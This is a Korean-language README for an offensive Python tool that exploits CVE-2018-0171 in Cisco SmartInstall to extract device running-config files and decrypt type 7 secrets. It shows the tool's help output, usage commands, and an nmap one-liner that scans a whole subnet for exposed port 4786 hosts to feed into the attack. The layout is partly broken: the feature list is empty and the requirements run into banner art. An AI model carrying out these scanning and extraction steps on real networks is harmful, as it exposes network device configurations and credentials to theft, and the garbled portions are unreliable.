
Cisco SmartInstall 익스플로잇 [CVE-2018-0171]
Cisco SmartInstall 익스플로잇 CVE-2018-0171
C. Papathanasiou PoC에서 영감을 받음
이 Python 3 스크립트는 SmartInstall을 실행 중인 Cisco 장치의 포트 4786을 사용하여 CVE-2018-0171을 익스플로잇합니다. 이 익스플로잇을 사용하면 공격자가 페이로드를 제작하여 Cisco 장치로 전송한 후 running-config 파일의 내용을 추출할 수 있습니다.
Cisco Smart Exploit 스크립트는 다음을 수행할 수 있습니다:

스크립트 사용을 위한 요구 사항 목록입니다:
tftpy==0.8.2c7decrypt — secret 7 복호화용
gem install c7decrypt __ __ __ __ __ __ ___ ___ __ __ ___
/ ` | /__` / ` / \ /__` |\/| /\ |__) | |__ \_/ |__) | / \ | |
\__, | .__/ \__, \__/ .__/ | | /~~\ | \ | |___ / \ | |___ \__/ | |
by @AlrikRr
usage: cisco-se.py [-h] (-i IP | -f FILE | -c CONFIG)
optional arguments:
-h, --help show this help message and exit
-i IP Single IP Address
-f FILE File that contains IP list
-c CONFIG running-config File standalone
예시 :
python3 cisco-se.py -i 192.168.10.1
python3 cisco-se.py -f ip_list.txt
python3 cisco-se.py -c running-config.txt
-f FILE 옵션의 경우, nmap을 사용한 예제는 다음과 같습니다:
nmap -p 4786 10.20.30.0/24 --open -Pn -oG - | awk '/Up$/{print $2}' > ip_list.txt
client.download() 중 일부 IP에 대한 시간 초과 오류 처리